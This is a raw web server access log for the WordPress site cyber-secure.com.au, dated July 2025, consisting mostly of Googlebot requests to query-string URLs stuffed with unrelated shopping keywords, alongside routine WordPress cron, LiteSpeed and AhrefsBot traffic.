209.74.77.214 - - [13/Jul/2025:23:06:07 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=K7kw4mHr0Cur77ReQyxfS9r2piuy0Qqm&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.234 - - [13/Jul/2025:23:06:28 +0000] "GET /?e=50601473141000&mod=45b865d1&uri=shared.php%3Fid%3D1688660-1275%26name%3Dporsche+junior+plus+seat HTTP/1.1" 200 20811 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [13/Jul/2025:23:07:05 +0000] "GET /?e=107586146001000&mod=32b991e5&uri=dp.php%3Fid%3D3590504-260%26name%3Dcanada+goose+paris+outlet HTTP/1.1" 200 22371 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [13/Jul/2025:23:08:11 +0000] "POST /wp-cron.php?doing_wp_cron=1752448091.4306058883666992187500 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
209.74.77.214 - - [13/Jul/2025:23:08:11 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=LYB6FGPrW5i42HTcUkMxr2r1qtI73NDB&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.235 - - [13/Jul/2025:23:08:10 +0000] "GET /?e=58295483031000&mod=5f0ad4db&uri=pin.php%3Fid%3D1945351-949%26name%3Dfloral%20coat%20ladies HTTP/1.1" 200 26103 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.233 - - [13/Jul/2025:23:08:16 +0000] "GET /?e=11428027041000&mod=6c9882bb&uri=news.php%3Fid%3D381558-25%26name%3Dnintendo+switch+news+2019 HTTP/1.1" 200 20675 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [13/Jul/2025:23:09:41 +0000] "GET /?e=58142308021000&mod=b4d22bb5&uri=us.php%3Fid%3D1940236-803%26name%3Dhonda+cbr+600+fireblade+1997 HTTP/1.1" 200 21997 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [13/Jul/2025:23:10:08 +0000] "GET /?e=32979514021000&mod=a952dded&uri=article.php%3Fid%3D1100718-1023%26name%3Dbaby+carrier+dubai HTTP/1.1" 200 21351 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [13/Jul/2025:23:11:07 +0000] "GET /?e=77470831011000&mod=28b9f8aa&uri=brands.php%3Fid%3D2585273-523%26name%3Dnike+takedo+sb HTTP/1.1" 200 21785 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [13/Jul/2025:23:11:17 +0000] "POST /get-message-notify HTTP/1.1" 200 21422 "https://cyber-secure.com.au/?e=77470831011000&mod=28b9f8aa&uri=brands.php%3Fid%3D2585273-523%26name%3Dnike+takedo+sb" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [13/Jul/2025:23:11:40 +0000] "GET /?e=33057749011000&mod=233f1dd0&uri=article.php%3Fid%3D1103337-596%26name%3Dacrylic+doll+display+case+10x10x16 HTTP/1.1" 200 21585 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [13/Jul/2025:23:12:12 +0000] "GET /?e=33197071021000&mod=281715ca&uri=products.php%3Fid%3D1107996-701%26name%3D4d+run+adidas HTTP/1.1" 200 21212 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.235 - - [13/Jul/2025:23:14:46 +0000] "GET /?e=58142428021000&mod=b4d22bb5&uri=category-info.php%3Fid%3D1940240-803%26name%3Dpit+bike+50+2t HTTP/1.1" 200 22275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [13/Jul/2025:23:15:21 +0000] "GET /?e=47252672001000&mod=c4b108f5&uri=blog.php%3Fid%3D1576938-1201%26name%3Dted+baker+shawl+scarf HTTP/1.1" 200 20980 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [13/Jul/2025:23:17:59 +0000] "GET /?e=72240472021000&mod=1abf005e&uri=info.php%3Fid%3D2410742-738%26name%3Dveste+de+ski+alpine+pro HTTP/1.1" 200 22029 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [13/Jul/2025:23:20:50 +0000] "POST /wp-cron.php?doing_wp_cron=1752448850.0550119876861572265625 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
51.222.253.5 - - [13/Jul/2025:23:20:49 +0000] "GET /?e=21098166041000&mod=07ac7cd1&uri=itm.php%3Fid%3D704258-781%26name%3Dadidas+eqt+boost+cream HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.74.77.214 - - [13/Jul/2025:23:20:50 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=yUcWsJt0MT7IkgThxTwZEtiEqqMP3iiL&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.234 - - [13/Jul/2025:23:20:45 +0000] "GET /?e=58142128041000&mod=b4d22bb5&uri=goods.php%3Fid%3D1940230-803%26name%3Dlook+795+rs+2021 HTTP/1.1" 200 22354 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.235 - - [13/Jul/2025:23:22:11 +0000] "GET /?e=27940542001000&mod=851300ee&uri=search.php%3Fid%3D932530-173%26name%3Dmicro+rc+boat HTTP/1.1" 200 22082 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.235 - - [13/Jul/2025:23:23:25 +0000] "GET /?e=72313197131000&mod=cf3c6554&uri=article.php%3Fid%3D2413175-1442%26name%3Drolex+explorer+nuovo HTTP/1.1" 200 21206 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [13/Jul/2025:23:26:06 +0000] "POST /wp-cron.php?doing_wp_cron=1752449166.2787001132965087890625 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.234 - - [13/Jul/2025:23:26:05 +0000] "GET /?e=58294013011000&mod=5f0ad4db&uri=pin.php%3Fid%3D1945302-949%26name%3Dwomen%27s+insulated+winter+pants HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
209.74.77.214 - - [13/Jul/2025:23:26:06 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=Y48SeihRIXcvWVBd08SyLAKtbGR6Iykn&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.234 - - [13/Jul/2025:23:26:47 +0000] "GET /?e=58108888001000&mod=d77314b5&uri=form.php%3Fid%3D1939122-1343%26name%3Dhotel+collection+pillows+for+side+sleepers HTTP/1.1" 200 21268 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [13/Jul/2025:23:27:56 +0000] "POST /wp-cron.php?doing_wp_cron=1752449276.5235319137573242187500 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
209.74.77.214 - - [13/Jul/2025:23:27:56 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=bISWG4XYxnltyszH5rEatSFvMGAoxHDO&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.234 - - [13/Jul/2025:23:27:55 +0000] "GET /?e=58294013011000&mod=5f0ad4db&uri=pin.php%3Fid%3D1945302-949%26name%3Dwomen%27s%20insulated%20winter%20pants HTTP/1.1" 200 26108 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.235 - - [13/Jul/2025:23:28:24 +0000] "GET /?e=50600123091000&mod=45b865d1&uri=news.php%3Fid%3D1688615-1275%26name%3Djoie+stages+car+seat+review HTTP/1.1" 200 21127 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [13/Jul/2025:23:28:35 +0000] "GET /?e=99572170001000&mod=9a4b930f&uri=article.php%3Fid%3D3322977-1438%26name%3Dnike+kevin+durant+red HTTP/1.1" 200 21526 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [13/Jul/2025:23:28:38 +0000] "GET /?e=50611463071000&mod=973a5f0c&uri=brands.php%3Fid%3D1688993-165%26name%3Daviator+coat+cream HTTP/1.1" 200 21876 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [13/Jul/2025:23:29:12 +0000] "POST /get-message-notify HTTP/1.1" 200 21393 "https://cyber-secure.com.au/?e=99572170001000&mod=9a4b930f&uri=article.php%3Fid%3D3322977-1438%26name%3Dnike+kevin+durant+red" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [13/Jul/2025:23:29:41 +0000] "GET /?e=33070709011000&mod=233f1dd0&uri=us.php%3Fid%3D1103769-596%26name%3Damerican+rag+doll HTTP/1.1" 200 21904 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.235 - - [13/Jul/2025:23:30:27 +0000] "GET /?e=52852488101000&mod=e9fb2eda&uri=search.php%3Fid%3D1763735-311%26name%3Dbarbie+extra+at+walmart HTTP/1.1" 200 21325 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [13/Jul/2025:23:30:30 +0000] "GET /?e=39556127011000&mod=45cef8e5&uri=search.php%3Fid%3D1320180-365%26name%3Dhypebeast+new+balance+580 HTTP/1.1" 200 21343 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [13/Jul/2025:23:30:51 +0000] "GET /?e=119632049001000&mod=a9b7ba70&uri=article.php%3Fid%3D3992488-100%26name%3D3039sl09 HTTP/1.1" 200 21114 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [13/Jul/2025:23:30:57 +0000] "POST /wp-cron.php?doing_wp_cron=1752449457.1396019458770751953125 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
51.222.253.13 - - [13/Jul/2025:23:30:55 +0000] "GET /?e=26361902011000&mod=1192265f&uri=pin.php%3Fid%3D879844-402%26name%3Duniforme+de+soldat HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.74.77.214 - - [13/Jul/2025:23:30:57 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=gKcurzjNlQZlDZl8cqs9Ln4DvUziesJ7&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.233 - - [13/Jul/2025:23:31:05 +0000] "GET /?e=13407705031000&mod=857c41bc&uri=products.php%3Fid%3D447647-597%26name%3Ddrying+trainers+in+tumble+dryer HTTP/1.1" 200 21902 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.235 - - [13/Jul/2025:23:32:09 +0000] "GET /?e=58176775051000&mod=b112ca40&uri=us.php%3Fid%3D1941389-481%26name%3Dpersonalised+iphone+12+pro+cases HTTP/1.1" 200 22202 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [13/Jul/2025:23:32:18 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=wQaoprYKKB2B2ZNR8DRXOvr0nfchps7B&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
173.208.198.210 - - [13/Jul/2025:23:32:19 +0000] "GET /?testPage HTTP/1.1" 200 26104 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
66.249.73.233 - - [13/Jul/2025:23:33:34 +0000] "GET /?e=19590934001000&mod=62ac9cd1&uri=blog.php%3Fid%3D653974-748%26name%3Dm0a08692 HTTP/1.1" 200 21826 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [13/Jul/2025:23:38:11 +0000] "GET /?e=58137988081000&mod=b4d22bb5&uri=shop.php%3Fid%3D1940092-803%26name%3Dtenere+t7 HTTP/1.1" 200 22183 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [13/Jul/2025:23:39:43 +0000] "POST /wp-cron.php?doing_wp_cron=1752449983.3331580162048339843750 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
51.222.253.15 - - [13/Jul/2025:23:39:42 +0000] "GET /?e=27923652011000&mod=4ef30115&uri=us.php%3Fid%3D931967-919%26name%3Dversace+by+gianni+versace HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.74.77.214 - - [13/Jul/2025:23:39:43 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=MhajOiFM2uHigbYBpU6BIHvJP2ZPJHSi&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.233 - - [13/Jul/2025:23:43:37 +0000] "GET /wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.29.2 HTTP/1.1" 200 165 "https://cyber-secure.com.au/?e=58294013011000&mod=5f0ad4db&uri=pin.php%3Fid%3D1945302-949%26name%3Dwomen%27s%20insulated%20winter%20pants" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [13/Jul/2025:23:44:18 +0000] "GET /?e=119555688051000&mod=9ee70b79&uri=pin.php%3Fid%3D3989939-437%26name%3Dbear+paw+womens+slippers HTTP/1.1" 200 22119 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [13/Jul/2025:23:49:14 +0000] "POST /wp-cron.php?doing_wp_cron=1752450554.7783510684967041015625 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
51.222.253.10 - - [13/Jul/2025:23:49:13 +0000] "GET /?e=28155966041000&mod=659b7b42&uri=blog.php%3Fid%3D939723-692%26name%3Dpredator+hunting+backpack+with+seat HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.74.77.214 - - [13/Jul/2025:23:49:14 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=HV3fRaEQZp1M06Y4dnGjLGXvlBYk1Zvm&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.235 - - [13/Jul/2025:23:49:17 +0000] "GET /?e=58141228041000&mod=b4d22bb5&uri=us.php%3Fid%3D1940200-803%26name%3Dspecialized+allez+e5+prezzo HTTP/1.1" 200 22464 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [13/Jul/2025:23:49:28 +0000] "GET /?e=10002115041000&mod=faad9525&uri=products.php%3Fid%3D333984-503%26name%3Dyeezy+triple+white+2019 HTTP/1.1" 200 20615 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [13/Jul/2025:23:55:23 +0000] "GET /?e=58141288031000&mod=b4d22bb5&uri=search.php%3Fid%3D1940202-803%26name%3Dguzzi+850t HTTP/1.1" 200 22177 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [13/Jul/2025:23:58:33 +0000] "POST /wp-cron.php?doing_wp_cron=1752451113.7775690555572509765625 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
51.222.253.15 - - [13/Jul/2025:23:58:32 +0000] "GET /?e=30191019021000&mod=62306523&uri=shared.php%3Fid%3D1007686-984%26name%3Dbass+pro+shop+child+life+jacket HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.74.77.214 - - [13/Jul/2025:23:58:33 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=uNpOAMFovg6mCQWok4c6p19OS6y6Ok12&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.234 - - [14/Jul/2025:00:01:25 +0000] "GET /?e=58141708021000&mod=b4d22bb5&uri=info.php%3Fid%3D1940216-803%26name%3Dsamebike+20lvxd30 HTTP/1.1" 200 22263 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.171.230.116 - - [14/Jul/2025:00:04:38 +0000] "GET /robots.txt HTTP/1.1" 200 77 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.249.73.233 - - [14/Jul/2025:00:06:30 +0000] "GET /?e=58120738081000&mod=b4d22bb5&uri=search.php%3Fid%3D1939517-803%26name%3Dktm+macina+prowler+2022 HTTP/1.1" 200 22043 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [14/Jul/2025:00:08:22 +0000] "GET /?e=52863618061000&mod=e9fb2eda&uri=product.php%3Fid%3D1764106-311%26name%3Dbarbie+lake HTTP/1.1" 200 21280 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [14/Jul/2025:00:08:45 +0000] "POST /wp-cron.php?doing_wp_cron=1752451725.9139890670776367187500 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
51.222.253.14 - - [14/Jul/2025:00:08:45 +0000] "GET /?e=30720811001000&mod=0a961288&uri=blog.php%3Fid%3D1025356-992%26name%3Dla+gear+from+the+80%27s HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.74.77.214 - - [14/Jul/2025:00:08:45 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=luyGoJdb6PUQIToD1nf3PQWDo4vkh5i1&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.233 - - [14/Jul/2025:00:12:50 +0000] "GET /?e=104227425011000&mod=e0bdb346&uri=article.php%3Fid%3D3478390-1625%26name%3Dasics+gel+cumulus+bambino HTTP/1.1" 200 20372 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.235 - - [14/Jul/2025:00:13:03 +0000] "GET /?e=58138648021000&mod=b4d22bb5&uri=info.php%3Fid%3D1940114-803%26name%3Dcity+e+bike+giant HTTP/1.1" 200 22536 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.235 - - [14/Jul/2025:00:15:49 +0000] "GET /?e=53029615031000&mod=080c993f&uri=blog.php%3Fid%3D1769647-464%26name%3Dpsd416g26662h HTTP/1.1" 200 21564 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [14/Jul/2025:00:17:18 +0000] "GET /?e=77442820051000&mod=fe2d0103&uri=article.php%3Fid%3D2584339-120%26name%3Dalma+en+pena+fiesta HTTP/1.1" 200 20512 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [14/Jul/2025:00:18:06 +0000] "POST /wp-cron.php?doing_wp_cron=1752452286.2450900077819824218750 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
51.222.253.19 - - [14/Jul/2025:00:18:04 +0000] "GET /?e=31723484021000&mod=1aab7baa&uri=pin.php%3Fid%3D1058819-1007%26name%3Dair+jordan+retro+high+og+bred HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.74.77.214 - - [14/Jul/2025:00:18:06 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=jdTMNAMR0j2HGsqgDqhIGDV7LCfHCe6G&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.234 - - [14/Jul/2025:00:18:10 +0000] "GET /?e=58140388041000&mod=b4d22bb5&uri=form.php%3Fid%3D1940172-803%26name%3Doltre+xr4+2018 HTTP/1.1" 200 22262 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [14/Jul/2025:00:18:46 +0000] "GET /?e=16984911011000&mod=a6ce9144&uri=product.php%3Fid%3D567005-678%26name%3Dlogo+apple+iphone+12 HTTP/1.1" 200 22541 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [14/Jul/2025:00:24:28 +0000] "GET /?e=58139008021000&mod=b4d22bb5&uri=itm.php%3Fid%3D1940126-803%26name%3Dmoto+guzzi+tenni HTTP/1.1" 200 22641 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.235 - - [14/Jul/2025:00:25:15 +0000] "GET /?e=50473942001000&mod=02ae6a78&uri=search.php%3Fid%3D1684406-381%26name%3Dnaturino+primi+passi+saldi HTTP/1.1" 200 21677 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [14/Jul/2025:00:26:15 +0000] "POST /wp-cron.php?doing_wp_cron=1752452775.7132809162139892578125 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.233 - - [14/Jul/2025:00:26:14 +0000] "GET /?e=119661793001000&mod=ee0b86d2&uri=pin.php%3Fid%3D3993480-466%26name%3Dtight+dress+with+cowboy+boots HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
209.74.77.214 - - [14/Jul/2025:00:26:15 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=xIyYaU40T5HVbSOoswTKSuIKSESsIvst&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.234 - - [14/Jul/2025:00:26:38 +0000] "GET /?e=119661793001000&mod=ee0b86d2&uri=pin.php%3Fid%3D3993480-466%26name%3Dtight%20dress%20with%20cowboy%20boots HTTP/1.1" 200 26101 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.233 - - [14/Jul/2025:00:26:48 +0000] "GET /wp-content/plugins/elementor/assets/js/shared-frontend-handlers.30dc2f9c080845a413a6.bundle.min.js HTTP/1.1" 200 2681 "https://cyber-secure.com.au/?e=119661793001000&mod=ee0b86d2&uri=pin.php%3Fid%3D3993480-466%26name%3Dtight%20dress%20with%20cowboy%20boots" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
